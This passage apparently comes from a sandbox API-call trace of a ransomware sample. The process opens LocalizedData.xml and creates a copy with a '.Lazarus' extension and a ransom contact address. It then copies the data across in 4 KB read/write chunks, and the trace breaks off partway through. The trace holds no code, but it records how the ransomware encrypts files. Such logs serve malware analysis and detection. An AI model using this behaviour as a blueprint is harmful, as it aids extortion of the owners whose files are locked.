hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.432] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.432] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0067.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0067.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0067.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.433] AreFileApisANSI () returned 1 [0067.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0067.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0067.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0067.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0067.434] AreFileApisANSI () returned 1 [0067.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0067.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.434] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.434] GetFileType (hFile=0x420) returned 0x1 [0067.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.434] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.435] CloseHandle (hObject=0x420) returned 1 [0067.435] AreFileApisANSI () returned 1 [0067.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0067.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.435] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.435] GetFileType (hFile=0x420) returned 0x1 [0067.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0067.435] CloseHandle (hObject=0x420) returned 1 [0067.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.436] AreFileApisANSI () returned 1 [0067.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0067.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.436] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc)) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.436] AreFileApisANSI () returned 1 [0067.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.437] GetLastError () returned 0x0 [0067.437] SetLastError (dwErrCode=0x0) [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0067.437] GetLastError () returned 0x0 [0067.437] SetLastError (dwErrCode=0x0) [0067.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x717c0 [0067.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0067.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0067.437] AreFileApisANSI () returned 1 [0067.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0067.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0067.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0067.438] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.438] GetFileType (hFile=0x420) returned 0x1 [0067.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0067.438] AreFileApisANSI () returned 1 [0067.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0067.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.438] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.438] GetFileType (hFile=0x428) returned 0x1 [0067.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.439] GetLastError () returned 0x0 [0067.439] SetLastError (dwErrCode=0x0) [0067.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.439] GetLastError () returned 0x0 [0067.439] SetLastError (dwErrCode=0x0) [0067.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.439] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0067.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.441] GetLastError () returned 0x0 [0067.441] SetLastError (dwErrCode=0x0) [0067.441] GetLastError () returned 0x0 [0067.441] SetLastError (dwErrCode=0x0) [0067.441] GetLastError () returned 0x0 [0067.441] SetLastError (dwErrCode=0x0) [0067.442] GetLastError () returned 0x0 [0067.442] SetLastError (dwErrCode=0x0) [0067.442] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.442] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.443] GetLastError () returned 0x0 [0067.443] SetLastError (dwErrCode=0x0) [0067.443] GetLastError () returned 0x0 [0067.443] SetLastError (dwErrCode=0x0) [0067.443] GetLastError () returned 0x0 [0067.443] SetLastError (dwErrCode=0x0) [0067.443] GetLastError () returned 0x0 [0067.443] SetLastError (dwErrCode=0x0) [0067.444] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.444] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.444] GetLastError () returned 0x0 [0067.444] SetLastError (dwErrCode=0x0) [0067.444] GetLastError () returned 0x0 [0067.444] SetLastError (dwErrCode=0x0) [0067.444] GetLastError () returned 0x0 [0067.444] SetLastError (dwErrCode=0x0) [0067.444] GetLastError () returned 0x0 [0067.444] SetLastError (dwErrCode=0x0) [0067.444] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.445] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.445] GetLastError () returned 0x0 [0067.445] SetLastError (dwErrCode=0x0) [0067.445] GetLastError () returned 0x0 [0067.445] SetLastError (dwErrCode=0x0) [0067.445] GetLastError () returned 0x0 [0067.445] SetLastError (dwErrCode=0x0) [0067.445] GetLastError () returned 0x0 [0067.445] SetLastError (dwErrCode=0x0) [0067.445] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.445] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.446] GetLastError () returned 0x0 [0067.446] SetLastError (dwErrCode=0x0) [0067.446] GetLastError () returned 0x0 [0067.446] SetLastError (dwErrCode=0x0) [0067.446] GetLastError () returned 0x0 [0067.446] SetLastError (dwErrCode=0x0) [0067.446] GetLastError () returned 0x0 [0067.446] SetLastError (dwErrCode=0x0) [0067.446] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.446] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.446] GetLastError () returned 0x0 [0067.446] SetLastError (dwErrCode=0x0) [0067.447] GetLastError () returned 0x0 [0067.447] SetLastError (dwErrCode=0x0) [0067.447] GetLastError () returned 0x0 [0067.447] SetLastError (dwErrCode=0x0) [0067.447] GetLastError () returned 0x0 [0067.447] SetLastError (dwErrCode=0x0) [0067.447] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.447] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.447] GetLastError () returned 0x0 [0067.447] SetLastError (dwErrCode=0x0) [0067.447] GetLastError () returned 0x0 [0067.447] SetLastError (dwErrCode=0x0) [0067.448] GetLastError () returned 0x0 [0067.448] SetLastError (dwErrCode=0x0) [0067.448] GetLastError () returned 0x0 [0067.448] SetLastError (dwErrCode=0x0) [0067.448] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, 